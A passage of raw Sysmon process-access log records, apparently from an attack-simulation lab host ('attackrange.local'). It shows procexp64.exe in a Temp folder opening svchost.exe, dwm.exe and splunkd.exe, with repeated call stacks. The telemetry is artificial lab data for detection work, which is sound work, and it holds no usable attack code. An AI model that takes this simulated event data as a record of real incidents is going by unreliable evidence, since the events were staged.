.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785341Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785340Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785339Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785338Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785337Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785336Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785335Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785334Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785333Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785332Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785331Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785330Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785329Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785328Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785327Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785326Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785325Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785324Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Win